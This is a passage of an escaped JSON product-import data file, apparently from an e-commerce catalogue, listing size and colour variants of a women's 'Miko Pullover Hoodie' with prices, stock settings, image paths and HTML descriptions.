Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1035\":{\"sku\":\"WH04-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-S-Purple\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1036\":{\"sku\":\"WH04-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-M-Blue\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1037\":{\"sku\":\"WH04-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-M-Orange\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1038\":{\"sku\":\"WH04-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-M-Purple\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1039\":{\"sku\":\"WH04-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-L-Blue\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1040\":{\"sku\":\"WH04-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-L-Orange\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1041\":{\"sku\":\"WH04-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-L-Purple\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1042\":{\"sku\":\"WH04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover Hoodie-XL-Blue\",\"description\":\"<p>After quality gym time, put on the Miko Pullover Hoody and keep your body warm. You\'ll find it\'s fashionable enough for the streets, but comfy enough to relax in at home.<\\/p>\\n<p>&bull; Teal two-tone hoodie.<br \\/>&bull; Low scoop neckline.<br \\/>&bull; Adjustable hood drawstrings.<br \\/>&bull; Longer rounded hemline for extra back coverage.<br \\/>&bull; Long-Sleeve style.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"miko-pullover-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh04-blue_alt1.jpg,\\/w\\/h\\/wh04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1043\":{\"sku\":\"WH04-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Miko Pullover 